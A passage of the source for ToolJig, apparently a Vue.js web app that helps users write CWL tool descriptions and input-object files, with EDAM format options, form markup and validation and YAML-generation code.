value=\"edam:format_3621\">SQLite format - Data format used by the SQLite database.</option>\n <option value=\"edam:format_3698\">SRA format - SRA archive format (SRA) is the archive format used for input to the NCBI...</option>\n <option value=\"edam:format_3017\">SRF - Sequence Read Format (SRF) of sequence trace data. Supports submission to...</option>\n <option value=\"edam:format_2002\">srs format - Simple multiple sequence (alignment) format for SRS.</option>\n <option value=\"edam:format_2003\">srspair - Simple sequence pair (alignment) format for SRS.</option>\n <option value=\"edam:format_3310\">SS - XRNA old input style format.</option>\n <option value=\"edam:format_1928\">Staden experiment format - Staden experiment file format.</option>\n <option value=\"edam:format_1960\">Staden format - Staden suite sequence format.</option>\n <option value=\"edam:format_1961\">Stockholm format - Stockholm multiple sequence alignment format (used by Pfam and Rfam).</option>\n <option value=\"edam:format_1962\">strider format - DNA strider output sequence format.</option>\n <option value=\"edam:format_2304\">STRING entry format (XML) - Entry format (XML) for the STRING database of protein interaction.</option>\n <option value=\"edam:format_3604\">SVG - Scalable Vector Graphics (SVG) is an XML-based vector image format for...</option>\n <option value=\"edam:format_2004\">T-Coffee format - T-Coffee program alignment format.</option>\n <option value=\"edam:format_3616\">tabix - TAB-delimited genome position file index format.</option>\n <option value=\"edam:format_3700\">Tabix index file format - Index file format used by the samtools package to index TAB-delimited genome...</option>\n <option value=\"edam:format_1665\">Taverna workflow format - Format of Taverna workflows.</option>\n <option value=\"edam:format_2033\">Tertiary structure format - Data format for a molecular tertiary structure.</option>\n <option value=\"edam:format_2021\">Text mining report format - Data format of a report from text mining.</option>\n <option value=\"edam:format_2330\">Textual format - Textual format.</option>\n <option value=\"edam:format_3712\">Thermo RAW - Proprietary file format for mass spectrometry data from Thermo Scientific.</option>\n <option value=\"edam:format_3835\">TIDE TXT - Format supported by the Tide tool for identifying peptides from tandem mass...</option>\n <option value=\"edam:format_3591\">TIFF - A versatile bitmap format.</option>\n <option value=\"edam:format_3876\">TNG - Trajectory Next Generation (TNG) is a format for storage of molecular...</option>\n <option value=\"edam:format_3879\">Topology format - Format of topology files; containing the static information of a structure...</option>\n <option value=\"edam:format_3866\">Trajectory format - File format to store trajectory information for a 3D structure .</option>\n <option value=\"edam:format_3867\">Trajectory format (binary) - Binary file format to store trajectory information for a 3D structure .</option>\n <option value=\"edam:format_3868\">Trajectory format (text) - Textual file format to store trajectory information for a 3D structure .</option>\n <option value=\"edam:format_3246\">TraML - TraML (Transition Markup Language) is the format for mass spectrometry...</option>\n <option value=\"edam:format_1436\">TreeBASE format - The format of an entry from the TreeBASE database of phylogenetic data.</option>\n <option value=\"edam:format_1911\">TreeCon format - Phylogenetic tree TreeCon (text) format.</option>\n <option value=\"edam:format_2005\">TreeCon-seq - Treecon format for (aligned) sequences.</option>\n <option value=\"edam:format_1437\">TreeFam format - The format of an entry from the TreeFam database of phylogenetic data.</option>\n <option value=\"edam:format_3910\">trr - Format of trr files that contain the trajectory of a simulation experiment...</option>\n <option value=\"edam:format_3475\">TSV - Tabular data represented as tab-separated values in a text file.</option>\n <option value=\"edam:format_3255\">Turtle - The Terse RDF Triple Language (Turtle) is a human-friendly serialisation...</option>\n <option value=\"edam:format_1206\">unambiguous pure - Alphabet for a molecular sequence with possible unknown positions but...</option>\n <option value=\"edam:format_1214\">unambiguous pure dna - Alphabet for a DNA sequence (characters ACGT only) with possible unknown...</option>\n <option value=\"edam:format_1211\">unambiguous pure nucleotide - Alphabet for a nucleotide sequence (characters ACGTU only) with possible...</option>\n <option value=\"edam:format_1218\">unambiguous pure protein - Alphabet for any protein sequence with possible unknown positions but...</option>\n <option value=\"edam:format_1216\">unambiguous pure rna sequence - Alphabet for an RNA sequence (characters ACGU only) with possible unknown...</option>\n <option value=\"edam:format_2096\">unambiguous sequence - Alphabet for a molecular sequence with possible unknown positions but...</option>\n <option value=\"edam:format_3853\">UniParc XML - XML format for the UniParc database.</option>\n <option value=\"edam:format_2187\">UniProt-like (text) - A text sequence format resembling uniprotkb entry format.</option>\n <option value=\"edam:format_1963\">UniProtKB format - UniProtKB entry sequence format.</option>\n <option value=\"edam:format_3771\">UniProtKB RDF - UniProtKB RDF sequence features format is an RDF format available for...</option>\n <option value=\"edam:format_3770\">UniProtKB XML - UniProtKB XML sequence features format is an XML format available for...</option>\n <option value=\"edam:format_2547\">uniprotkb-like format - A sequence format resembling uniprotkb entry format.</option>\n <option value=\"edam:format_3854\">UniRef XML - XML format for the UniRef reference clusters.</option>\n <option value=\"edam:format_2095\">unpure - Alphabet for a molecular sequence with possible unknown positions but...</option>\n <option value=\"edam:format_3016\">VCF - Variant Call Format (VCF) for sequence variation (indels, polymorphisms,...</option>\n <option value=\"edam:format_3699\">VDB - VDB ('vertical database') is the native format used for export from the NCBI...</option>\n <option value=\"edam:format_1458\">Vienna local RNA secondary structure format - Format of local RNA secondary structure components with free energy values,...</option>\n <option value=\"edam:format_3821\">VisML - Default XML format of VisANT, containing all the network information.</option>\n <option value=\"edam:format_3858\">Waters RAW - Proprietary file format for mass spectrometry data from Waters.</option>\n <option value=\"edam:format_3710\">WIFF format - Mass spectrum file format from QSTAR and QTRAP instruments (ABI/Sciex).</option>\n <option value=\"edam:format_3005\">WIG - Wiggle format (WIG) of a sequence annotation track that consists of a value...</option>\n <option value=\"edam:format_2032\">Workflow format - Format of a workflow.</option>\n <option value=\"edam:format_3711\">X!Tandem XML - Output format used by X! series search engines that is based on the XML...</option>\n <option value=\"edam:format_3598\">xbm - X BitMap is a plain text binary image format used by the X Window System...</option>\n <option value=\"edam:format_3618\">xgmml - XML-based format used to store graph descriptions within Galaxy.</option>\n <option value=\"edam:format_3468\">xls - Microsoft Excel spreadsheet format.</option>\n <option value=\"edam:format_3620\">xlsx - MS Excel spreadsheet format consisting of a set of XML documents stored in a...</option>\n <option value=\"edam:format_3811\">XMFA - The A2M format is used as the primary format for multiple alignments of...</option>\n <option value=\"edam:format_2332\">XML - eXtensible Markup Language (XML) format.</option>\n <option value=\"edam:format_3599\">xpm - X PixMap (XPM) is an image file format used by the X Window System, it is...</option>\n <option value=\"edam:format_3789\">XQuery - XQuery (XML Query) is a query language (format of queries) for querying and...</option>\n <option value=\"edam:format_3804\">xsd - XML format for XML Schema.</option>\n <option value=\"edam:format_3875\">XTC - Portable binary format for trajectories produced by GROMACS package.</option>\n <option value=\"edam:format_3877\">XYZ - The XYZ chemical file format is widely supported by many programs, although...</option>\n <option value=\"edam:format_3750\">YAML - YAML (YAML Ain't Markup Language) is a human-readable tree-structured data...</option>\n <option value=\"edam:format_3915\">Zarr - The Zarr format is an implementation of chunked, compressed, N-dimensional...</option>\n <option value=\"edam:format_3018\">ZTR - ZTR format for storing chromatogram data from DNA sequencing instruments.</option>\n </select>\n <p><small>Please specify the file format (optional). These formats are from the <a href=\"http://edamontology.org/page\" target=\"_blank\">EDAM Ontology</a> and apply to bioinformatics tools.</small></p>\n </div>\n\n <p v-if=\"output_errors.length > 0\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in output_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n\n <div class=\"form-group\">\n <button class=\"btn btn-info\" :disabled=\"newOutputID == '' || newOutputGlob == '' || newOutputDoc == ''\">Add / Update</button>\n </div>\n </form>\n\n <p v-if=\"outputs.length > 0\">Here you can edit (<span class=\"glyphicon glyphicon-edit\" aria-hidden=\"true\"></span>) or delete (<span class=\"glyphicon glyphicon-remove\" aria-hidden=\"true\"></span>) outputs.</p>\n\n <ol class=\"list-group\">\n <li v-for=\"output in outputs\" class=\"list-group-item\">{{ output.ID }}\n <button v-on:click=\"editOutput(output)\" class=\"btn btn-default\">\n <span class=\"glyphicon glyphicon-edit\" aria-hidden=\"true\"></span>\n </button>\n <button v-on:click=\"deleteOutput(output, true)\" class=\"btn btn-default\">\n <span class=\"glyphicon glyphicon-remove\" aria-hidden=\"true\"></span>\n </button>\n </li>\n </ol>\n\n <p v-if=\"overall_output_errors.length > 0\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in overall_output_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n </div>\n\n <h4>CWL document:</h4>\n\n <p v-if=\"this.cwl.length == 0\"><font color=\"red\">At least one error (see above) must be addressed before the CWL document can be generated.</font></p>\n\n <pre v-text=\"cwl\" v-if=\"cwl\"></pre>\n \n <p v-if=\"this.cwl.length > 0\">\n <div class=\"form-group\">\n <button class=\"btn btn-info\" variant=\"outline-primary\" v-on:click=\"downloadCwl\">Download CWL file</button>\n </div>\n <div>\n ToolJig does not have a way to save your CWL file, so be sure to download it before you close the app. If you wish to edit the CWL file later, you can upload it back into ToolJig.\n </div>\n </p>\n\n <hr style=\"border: 1px solid black;border-radius: 1px;\" />\n\n <h4>Create input-object file:</h4>\n\n Once you have created a valid CWL file, you can create an input-object file, which defines inputs that will be used when the tool is executed in one particular instance. The boxes below correspond to the inputs defined above.\n\n <!--This defines how the dynamic input forms will be created.-->\n <component \n v-for=\"(input, index) in inputs\" \n :key=\"input.name\"\n :is=\"input.type\"\n v-bind=\"input\"\n v-model=\"inputs[index].value\">\n </component>\n\n <p v-if=\"download_job_errors.length\"><font color=\"red\">\n <b>Please correct the following error(s):</b>\n <ul>\n <li v-for=\"error in download_job_errors\">{{ error }}</li>\n </ul>\n </font>\n </p>\n\n <pre v-text=\"job\" v-if=\"job\"></pre>\n\n <div class=\"form-group\">\n <button class=\"btn btn-info\" variant=\"outline-primary\" v-on:click=\"downloadJob\" :disabled=\"job.length == 0\">Download input-object file</button>\n </div></p>\n\n <hr style=\"border: 1px solid black;border-radius: 1px;\" v-if=\"cwl.length > 0 && job.length > 0\" />\n\n <h4 v-if=\"cwl.length > 0 && job.length > 0\">Example command to execute the tool:</h4>\n\n <p v-if=\"cwl.length > 0 && job.length > 0\">First, you must install <a href=\"https://github.com/common-workflow-language/cwltool\" target=\"_blank\">cwltool</a> and <a href=\"https://docs.docker.com/engine/install\" target=\"_blank\">Docker Engine</a>. Then you can execute the following command, assuming the CWL file and input-object file are in your current working directory (if not, modify the command to point to the locations of these files). Alternatively, you can execute the tool using a variety of <a href=\"https://www.commonwl.org/#Implementations\" target=\"_blank\">other engines</a>.</p>\n\n <pre v-text=\"example_command\" v-if=\"cwl.length > 0 && job.length > 0\"></pre>\n </div>\n</div>\n\n<script>\n // These components define the dynamic behavior of the job-input boxes that are created.\n // From example at https://www.raymondcamden.com/2018/10/31/working-with-dynamic-components-in-vuejs\n Vue.component(\"string\", {\n props: ['name', 'doc', 'value'],\n template: `<div class=\"form-group\"><label>{{ name }}<sup><font color=\"red\">*</font></sup>:</label><input type=\"text\" @input=\"updateVal\" v-model=\"text\" class=\"form-control\" aria-describedby=\"helpBlock\" /><span id=\"helpBlock\" class=\"form-text text-muted\">{{ doc }}</span></div>`,\n data() { return { text:null } },\n created() { this.text = this.value; },\n methods:{ updateVal() { this.$emit('input', this.text); } }\n });\n Vue.component(\"int\", {\n props: ['name', 'doc', 'value'],\n template: `<div class=\"form-group\"><label>{{ name }}<sup><font color=\"red\">*</font></sup>:</label><input type=\"text\" @input=\"updateVal\" v-model=\"text\" class=\"form-control\" aria-describedby=\"helpBlock\" /><span id=\"helpBlock\" class=\"form-text text-muted\">{{ doc }}</span></div>`,\n data() { return { text:null } },\n created() { this.text = this.value; },\n methods:{ updateVal() { this.$emit('input', this.text); } }\n });\n Vue.component(\"File\", {\n props: ['name', 'doc', 'value'],\n template: `<div class=\"form-group\"><label>{{ name }}<sup><font color=\"red\">*</font></sup>:</label><input type=\"text\" @input=\"updateVal\" v-model=\"text\" class=\"form-control\" aria-describedby=\"helpBlock\" /><span id=\"helpBlock\" class=\"form-text text-muted\">{{ doc }}</span></div>`,\n data() { return { text:null } },\n created() { this.text = this.value; },\n methods:{ updateVal() { this.$emit('input', this.text); } }\n });\n // Vue.component(\"Directory\", {\n // props: ['name', 'doc', 'value'],\n // template: `<div class=\"form-group\"><label>{{ name }}<sup><font color=\"red\">*</font></sup>:</label><input type=\"text\" @input=\"updateVal\" v-model=\"text\" class=\"form-control\" aria-describedby=\"helpBlock\" /><span id=\"helpBlock\" class=\"form-text text-muted\">{{ doc }}</span></div>`,\n // data() { return { text:null } },\n // created() { this.text = this.value; },\n // methods:{ updateVal() { this.$emit('input', this.text); } }\n // });\n Vue.component(\"Output_File\", {\n props: ['name', 'doc', 'value'],\n template: `<div class=\"form-group\"><label>{{ name }}<sup><font color=\"red\">*</font></sup>:</label><input type=\"text\" @input=\"updateVal\" v-model=\"text\" class=\"form-control\" aria-describedby=\"helpBlock\" /><span id=\"helpBlock\" class=\"form-text text-muted\">{{ doc }}</span></div>`,\n data() { return { text:null } },\n created() { this.text = this.value; },\n methods:{ updateVal() { this.$emit('input', this.text); } }\n });\n\n // This is the main Vue app.\n new Vue({\n el: \"#cwl_app\",\n\n data: {\n basics_errors: [],\n input_errors: [],\n overall_input_errors: [],\n auxiliary_errors: [],\n template_errors: [],\n output_errors: [],\n overall_output_errors: [],\n download_job_errors: [],\n tool_id: \"\",\n tool_label: \"\",\n doc: \"\",\n dockerfile: \"\",\n author_name: \"\",\n author_orcid: \"\",\n license: \"Apache-2.0\",\n newInputName: \"\",\n newInputType: \"string\",\n newInputDoc: \"\",\n newInputSecondary: \"\",\n newInputFileFormat: \"\",\n inputs: [],\n newAuxName: \"\",\n newAuxContents: \"\",\n auxiliary_files: [],\n stdout_file_name: \"stdout.txt\",\n stderr_file_name: \"stderr.txt\",\n outputs: [],\n newOutputID: \"\",\n newOutputGlob: \"\",\n newOutputDoc: \"\",\n newOutputSecondary: \"\",\n newOutputFileFormat: \"\",\n command_template: \"\",\n example_cache: {}\n },\n\n // Computed attributes build content dynamically for display in the app.\n // In this app, we perform input validation before returning cwl and job documents.\n computed: {\n cwl: function() {\n this.basics_errors = [];\n this.template_errors = [];\n this.overall_input_errors = [];\n this.overall_output_errors = [];\n\n if (this.tool_id.trim() == \"\")\n this.basics_errors.push(\"Only letters, numbers, and underscores are allowed.\");\n\n if (/[^A-Za-z0-9_]+/.test(this.tool_id))\n this.basics_errors.push(\"The tool identifier must only container letters, numbers, and underscores.\")\n\n if (this.tool_label.trim() == \"\")\n this.basics_errors.push(\"Please specify a label.\");\n\n if (this.dockerfile.trim() == \"\")\n this.basics_errors.push(\"Please specify a Dockerfile.\");\n\n if (this.author_orcid.trim() != \"\" && !this.isValidORCID(this.author_orcid))\n this.basics_errors.push(\"Please specify a valid ORCID identifier (e.g., https://orcid.org/0000-0001-2222-3456).\");\n\n if (this.command_template.trim() == \"\")\n this.template_errors.push(\"Please specify a command template.\");\n\n input_count = 0;\n var i;\n for (i = 0; i < this.inputs.length; i++)\n if (this.inputs[i].type != \"Output_File\")\n input_count += 1;\n\n if (input_count == 0)\n //this.overall_input_errors.push(\"You must specify at least one input. It may be any of the following input types: string, int, File, or Directory.\");\n this.overall_input_errors.push(\"You must specify at least one input. It may be any of the following input types: string, int, or File.\");\n\n for (i = 0; i < this.inputs.length; i++) {\n //if (this.inputs[i].type == \"File\" || this.inputs[i].type == \"Directory\") {\n if (this.inputs[i].type == \"File\") {\n re = new RegExp(`\\\\$\\\\(inputs\\\\.${this.inputs[i].name}\\\\.(path|basename|dirname|nameroot|nameext)\\\\)`);\n if (!re.test(this.command_template)) {\n this.template_errors.push(`All inputs must be used at least once in the command template: ${this.inputs[i].name} was not used. It must be specified in the command template using $(inputs.${this.inputs[i].name}) followed by one of these attributes: .path, .basename, .dirname, .nameroot, .nameext.`);\n break;\n }\n }\n else {\n re = new RegExp(`\\\\$\\\\(inputs\\\\.${this.inputs[i].name}\\\\)`);\n if (!re.test(this.command_template)) {\n this.template_errors.push(`All inputs must be used at least once in the command template: ${this.inputs[i].name} was not used. It can be specified in the command template as $(inputs.${this.inputs[i].name}).`);\n break;\n }\n }\n }\n\n for (i = 0; i<this.auxiliary_files.length; i++) {\n re = new RegExp(this.auxiliary_files[i].name.replace(/\\./g, \"\\\\.\"));\n if (!re.test(this.command_template)) {\n this.template_errors.push(`All auxiliary files must be used at least once in the command template: ${this.auxiliary_files[i].name} was not used.`)\n break;\n }\n }\n\n var output_count = this.outputs.length;\n var i;\n for (i = 0; i<this.inputs.length; i++) {\n if (this.inputs[i].type == \"Output_File\")\n output_count += 1;\n }\n\n if (output_count == 0 && this.parseStandardMessages() == \"\")\n this.overall_output_errors.push(\"You must specify at least one output.\");\n\n if (this.basics_errors.length > 0 || this.template_errors.length > 0 || this.overall_input_errors.length > 0 || this.overall_output_errors.length > 0)\n return \"\";\n\n return `cwlVersion: v1.2\nclass: CommandLineTool\nlabel: ${this.tool_label}\n${this.buildOptionalString(\"doc: |-\\n\", this.indent(2, this.doc))}\nrequirements:\n ShellCommandRequirement: {}\n InlineJavascriptRequirement: {}\n DockerRequirement:\n dockerImageId: ${this.tool_id}\n dockerFile: |-\\n${this.indent(6, this.dockerfile)}\n${this.network_access}\n${this.parseAuxiliaryFiles()}\n${this.parseInputs()}\n${this.buildOptionalString(`arguments:\n - shellQuote: false\n valueFrom: |-\\n`, this.indent(6, this.command_template.replace(/\\n\\n/g, \"\\n\").replace(/\\n/g, \"\\n\\n\")))}\noutputs:\n${this.parseOutputs()}\n${this.parseStandardMessages()}\n\n${this.parseAuthorInfo()}\n\ns:dateCreated: \"${this.getTodayDate()}\"\ns:license: https://spdx.org/licenses/${this.license}\n \n$namespaces:\n s: https://schema.org/\n edam: http://edamontology.org/\n$schemas:\n - https://schema.org/version/latest/schemaorg-current-http.rdf\n - http://edamontology.org/EDAM_1.23.owl\n `.replace(/\\n\\n/g, \"\\n\").replace(/\\n\\n/g, \"\\n\").trim();\n },\n job: function() {\n this.download_job_errors = [];\n var i;\n for (i = 0; i<this.inputs.length; i++) {\n if (this.inputs[i].value.trim() == \"\")\n this.download_job_errors.push(\"No value specified for \" + this.inputs[i].name + \".\");\n else if (this.inputs[i].type == \"int\" && /[^\\d]/.test(this.inputs[i].value))\n this.download_job_errors.push(\"Must specify an integer for \" + this.inputs[i].name + \".\");\n }\n if (this.download_job_errors.length > 0)\n return \"\";\n\n output = \"\";\n\n var i;\n for (i = 0; i<this.inputs.length; i++)\n {\n if (this.inputs[i].type == \"string\" || this.inputs[i].type == \"Output_File\") {\n output += this.inputs[i].name + \": \\\"\" + this.inputs[i].value + \"\\\"\\n\";\n }\n else {\n if (this.inputs[i].type == \"int\") {\n output += this.inputs[i].name + \": \" + this.inputs[i].value + \"\\n\";\n }\n else {\n output += this.inputs[i].name + \":\\n\";\n output += \" class: \" + this.inputs[i].type + \"\\n\";\n output += \" path: \\\"\" + this.inputs[i].value + \"\\\"\\n\";\n\n if (this.inputs[i].type == \"File\" && this.inputs[i].format != \"\")\n output += \" format: \" + this.inputs[i].format.replace(\"edam:\", \"http://edamontology.org/\") + \"\\n\";\n }\n }\n }\n\n return output;\n },\n network_access: function() {\n if (this.dockerfile.trim().length > 0)\n return \" NetworkAccess:\\n class: NetworkAccess\\n networkAccess: true\\n\";\n return \"\";\n },\n cwl_file_name: function() { return `${this.tool_id}.cwl`; },\n job_file_name: function() { return `${this.tool_id}_objects.yml`; },\n example_command: function() {\n return `cwltool ${this.cwl_file_name} ${this.job_file_name}`;\n }\n },\n\n methods: {\n onUploadFile: function(e) {\n var files = e.target.files || e.dataTransfer.files;\n if (!e.target.files.length) {\n console.log(\"No file was detected.\");\n return;\n }\n\n const reader = new FileReader();\n\n reader.onload = event => {\n\t const text = reader.result;\n const yaml_dict = jsyaml.safeLoad(text);\n\n if (yaml_dict[\"cwlVersion\"] != \"v1.0\" && yaml_dict[\"cwlVersion\"] != \"v1.1\" && yaml_dict[\"cwlVersion\"] != \"v1.2\") {\n alert(`${fileName} is not using a version of CWL that is compatible with this tool (1.0, 1.1, or 1.2).`);\n\n return;\n }\n\n this.tool_id = this.getYamlValue(yaml_dict, [\"requirements\", \"DockerRequirement\", \"dockerImageId\"], true);\n this.tool_label = this.getYamlValue(yaml_dict, [\"label\"], false);\n this.doc = this.getYamlValue(yaml_dict, [\"doc\"], false);\n this.dockerfile = this.getYamlValue(yaml_dict, [\"requirements\", \"DockerRequirement\", \"dockerFile\"], true);\n this.author_name = this.getYamlValue(yaml_dict, [\"s:author\", 0, \"s:name\"], false);\n this.author_orcid = this.getYamlValue(yaml_dict, [\"s:author\", 0, \"s:identifier\"], false);\n this.license = this.getYamlValue(yaml_dict, [\"s:license\"], false).split(\"/\").slice(-1)[0];\n\n this.inputs = [];\n this.newInputName = \"\";\n this.newInputType = \"string\";\n this.newInputDoc = \"\";\n this.newInputSecondary = \"\";\n this.newInputFileFormat = \"\";\n\n inputs_dict = this.getYamlValue(yaml_dict, [\"inputs\"], false);\n\n for (var key in inputs_dict) {\n input_dict = inputs_dict[key];\n input_dict[\"name\"] = key;\n\n input_dict[\"is_output_file\"] = false;\n if (/\\n#Output_File/.test(input_dict[\"doc\"])) {\n var parts1 = input_dict[\"doc\"].split(\"\\n#Output_File=\");\n\n input_dict[\"type\"] = \"Output_File\";\n input_dict[\"doc\"] = parts1[0].trim();\n input_dict[\"is_output_file\"] = true;\n\n var parts2 = parts1[1].split(\";\");\n input_dict[\"format\"] = parts2[0].replace(\"format: \", \"\").trim();\n \n if (parts2.length > 1 && parts2[1].trim().length > 0)\n input_dict[\"secondaryFiles\"] = parts2[1].replace(\"secondaryFiles: \", \"\").trim().split(\",\");\n }\n else if (!(\"format\" in input_dict))\n input_dict[\"format\"] = \"\";\n\n if (!(\"secondaryFiles\" in input_dict))\n input_dict[\"secondaryFiles\"] = [];\n\n input_dict[\"value\"] = \"\";\n\n this.inputs.push(input_dict);\n }\n\n this.sortArrayOfObjects(this.inputs, \"name\");\n\n this.auxiliary_files = [];\n this.newAuxName = \"\";\n this.newAuxContents = \"\";\n\n aux_files = this.getYamlValue(yaml_dict, [\"requirements\", \"InitialWorkDirRequirement\", \"listing\"], false);\n if (aux_files != \"\") {\n var i;\n for (i = 0; i < aux_files.length; i++) {\n this.auxiliary_files.push({\n name: aux_files[i][\"entryname\"],\n contents: aux_files[i][\"entry\"]\n });\n }\n }\n\n this.sortArrayOfObjects(this.auxiliary_files, \"name\");\n\n this.command_template = this.getYamlValue(yaml_dict, [\"arguments\", 0, \"valueFrom\"], true);\n\n this.stdout_file_name = \"\";\n if (\"stdout\" in yaml_dict)\n this.stdout_file_name = yaml_dict[\"stdout\"];\n this.stderr_file_name = \"\";\n if (\"stderr\" in yaml_dict)\n this.stderr_file_name = yaml_dict[\"stderr\"];\n\n this.outputs = [];\n this.newOutputID = \"\";\n this.newOutputGlob = \"\";\n this.newOutputDoc = \"\";\n this.newOutputSecondary = \"\";\n this.newOutputFileFormat = \"\";\n\n outputs_dict = this.getYamlValue(yaml_dict, [\"outputs\"], false);\n\n for (var key in outputs_dict) {\n if (key == \"standard_output\" || key == \"standard_error\")\n continue;\n\n // Check to see if it's an Output_File. If so, don't add it to the outputs.\n if (key in this.getYamlValue(yaml_dict, [\"inputs\"], false)) {\n if (this.getYamlValue(yaml_dict, [\"inputs\"], false)[key][\"is_output_file\"]) {\n continue;\n }\n };\n\n output_dict = {};\n output_dict[\"ID\"] = key;\n output_dict[\"glob\"] = outputs_dict[key][\"outputBinding\"][\"glob\"];\n output_dict[\"doc\"] = outputs_dict[key][\"doc\"];\n output_dict[\"format\"] = outputs_dict[key][\"format\"];\n output_dict[\"secondaryFiles\"] = [];\n if (\"secondaryFiles\" in outputs_dict[key])\n output_dict[\"secondaryFiles\"] = outputs_dict[key][\"secondaryFiles\"];\n\n this.outputs.push(output_dict);\n }\n\n this.sortArrayOfObjects(this.outputs, \"ID\");\n\n e.target.value = \"\";\n\t }\n\n\t reader.onerror = (e) => {\n alert(\"An error occurred when trying to parse the input file. Please contact the developer for help in addressing this problem.\")\n\t console.error(e);\n\t }\n\n\t reader.readAsText(e.target.files[0]);\n },\n getYamlValue: function(yaml_dict, key_array, indicate_missing) {\n // This goes iteratively deeper into the dictionary to try to find the value.\n my_dict = yaml_dict;\n var i;\n var message = \"\";\n for (i = 0; i < key_array.length; i++) {\n key = key_array[i];\n\n if (key in my_dict) {\n my_dict = my_dict[key];\n }\n else {\n if (indicate_missing) {\n return \"[No value was specified in the uploaded file.]\";\n }\n else {\n return \"\";\n }\n }\n }\n \n return my_dict;\n },\n sortArrayOfObjects: function(array, key) {\n array.sort((a, b) => {\n if (a[key] < b[key]) {\n return -1;\n }\n if (a[key] > b[key]) {\n return 1;\n }\n return 0;\n });\n },\n parseSecondaryFiles: function(inputValue, errorsArray) {\n if (inputValue != \"\") {\n inputValue = inputValue.replace(/ /g, \"\");\n\n var j;\n var secondaryValues = inputValue.split(\",\");\n for (j = 0; j < secondaryValues.length; j++) {\n if (!secondaryValues[j].startsWith(\".\"))\n {\n errorsArray.push(\"Secondary file extensions must start with a period and be separated by commas.\");\n break;\n }\n\n if (!/[A-Za-z]+/.test(secondaryValues[j])) {\n errorsArray.push(\"Secondary file extensions must contain at least one letter.\");\n break;\n }\n }\n\n return secondaryValues;\n }\n\n return [];\n },\n addInput: function () {\n this.input_errors = [];\n\n if (/[^a-zA-Z_0-9]+/.test(this.newInputName))\n this.input_errors.push(\"Input names must only contain letters, numbers, and underscores.\");\n\n var secondaryFiles = this.parseSecondaryFiles(this.newInputSecondary, this.input_errors);\n\n if (this.input_errors.length > 0)\n return;\n\n // Remove any duplicates\n var i;\n for (i = 0; i < this.inputs.length; i++)\n if (this.inputs[i].name == this.newInputName)\n this.deleteInput(this.inputs[i]);\n\n this.inputs.push({\n name: this.newInputName,\n type: this.newInputType,\n doc: this.newInputDoc,\n secondaryFiles: secondaryFiles,\n format: this.newInputFileFormat,\n value: \"\"\n });\n\n this.sortArrayOfObjects(this.inputs, \"name\");\n\n this.newInputName = \"\";\n this.newInputType = \"string\";\n this.newInputDoc = \"\";\n this.newInputSecondary = \"\";\n this.newInputFileFormat = \"\";\n },\n deleteInput: function (x) {\n this.inputs = this.inputs.filter(function(value, index, arr) {\n return value.name != x.name;\n })\n },\n editInput: function (x) {\n this.newInputName = x.name;\n if (x.type == \"Output_File\") {\n this.newInputType = \"Output_File\";\n }\n else {\n this.newInputType = x.type;\n }\n\n this.newInputDoc = x.doc;\n this.newInputSecondary = x.secondaryFiles.join(\",\");\n this.newInputFileFormat = x.format.replace(\"format: \", \"\");\n this.$refs.newInputName.focus();\n this.$refs.inputPanel.scrollIntoView();\n },\n addAuxiliaryFile: function() {\n this.auxiliary_errors = [];\n if (/[^a-zA-Z_0-9\\.]+/.test(this.newAuxName))\n this.auxiliary_errors.push(\"The names of auxiliary files must only contain letters, numbers, underscores, and periods.\");\n\n if (this.auxiliary_errors.length > 0)\n return;\n\n // Make sure no duplicates\n var i;\n for (i = 0; i < this.auxiliary_files.length; i++)\n if (this.auxiliary_files[i].name == this.newAuxName)\n this.deleteAuxiliaryFile(this.auxiliary_files[i], false);\n\n this.auxiliary_files.push({\n name: this.newAuxName,\n contents: this.newAuxContents\n });\n\n this.sortArrayOfObjects(this.auxiliary_files, \"name\");\n\n this.newAuxName = \"\";\n this.newAuxContents = \"\";\n },\n deleteAuxiliaryFile: function(x, clear) {\n this.auxiliary_files = this.auxiliary_files.filter(function(value, index, arr) {\n return value.name != x.name;\n })\n\n if (clear) {\n this.newAuxName = \"\";\n this.newAuxContents = \"\";\n }\n },\n editAuxiliaryFile: function(x) {\n this.newAuxName = x.name;\n this.newAuxContents = x.contents;\n this.$refs.newAuxName.focus();\n this.$refs.auxPanel.scrollIntoView();\n },\n addOutput: function() {\n this.output_errors = [];\n\n if (/[^a-zA-Z_0-9]+/.test(this.newOutputID))\n this.output_errors.push(\"Output identifiers must only contain letters, numbers, and underscores.\");\n\n // Make sure the expression is valid\n if (/[*?]/.test(this.newOutputGlob))\n this.output_errors.push(\"Output file expressions cannot include wildcard characters (* or ?).\");\n\n var secondaryFiles = this.parseSecondaryFiles(this.newOutputSecondary, this.output_errors);\n\n if (this.output_errors.length > 0)\n return;\n\n // Make sure there are no duplicates\n var i;\n for (i = 0; i < this.outputs.length; i++)\n if (this.outputs[i].ID == this.newOutputID)\n this.deleteOutput(this.outputs[i], false);\n\n this.outputs.push({\n ID: this.newOutputID,\n glob: this.newOutputGlob,\n doc: this.newOutputDoc,\n secondaryFiles: secondaryFiles,\n format: this.newOutputFileFormat\n });\n\n this.sortArrayOfObjects(this.outputs, \"ID\");\n\n this.newOutputID = \"\";\n this.newOutputGlob = \"\";\n this.newOutputDoc = \"\";\n this.newOutputSecondary = \"\";\n this.newOutputFileFormat = \"\";\n },\n deleteOutput: function(x, clear) {\n this.outputs = this.outputs.filter(function(value, index, arr) {\n return value.ID != x.ID;\n })\n\n if (clear) {\n this.newOutputID = \"\";\n this.newOutputGlob = \"\";\n this.newOutputDoc = \"\";\n this.newOutputSecondary = \"\";\n this.newOutputFileFormat = \"\";\n }\n },\n editOutput: function(x) {\n this.newOutputID = x.ID;\n this.newOutputGlob = x.glob;\n this.newOutputDoc = x.doc;\n this.newOutputSecondary = x.secondaryFiles.join(\",\");\n this.newOutputFileFormat = x.format;\n this.$refs.newOutputID.focus();\n this.$refs.outputPanel.scrollIntoView();\n },\n parseInputs: function() {\n result = \"\";\n if (this.inputs.length > 0) {\n result = \"inputs:\\n\"\n }\n\n var i;\n for (i = 0; i < this.inputs.length; i++)\n {\n input_type = this.inputs[i].type;\n if (input_type == \"Output_File\")\n input_type = \"string\";\n\n result += \"\\n \" + this.inputs[i].name + \":\\n\";\n result += \" type: \" + input_type + \"\\n\";\n\n doc = this.inputs[i].doc;\n if (this.inputs[i].type == \"Output_File\") {\n doc += `\\n#Output_File=format: ${this.inputs[i].format}`;\n }\n\n if (this.inputs[i].type == \"File\" && this.inputs[i].format != \"\")\n result 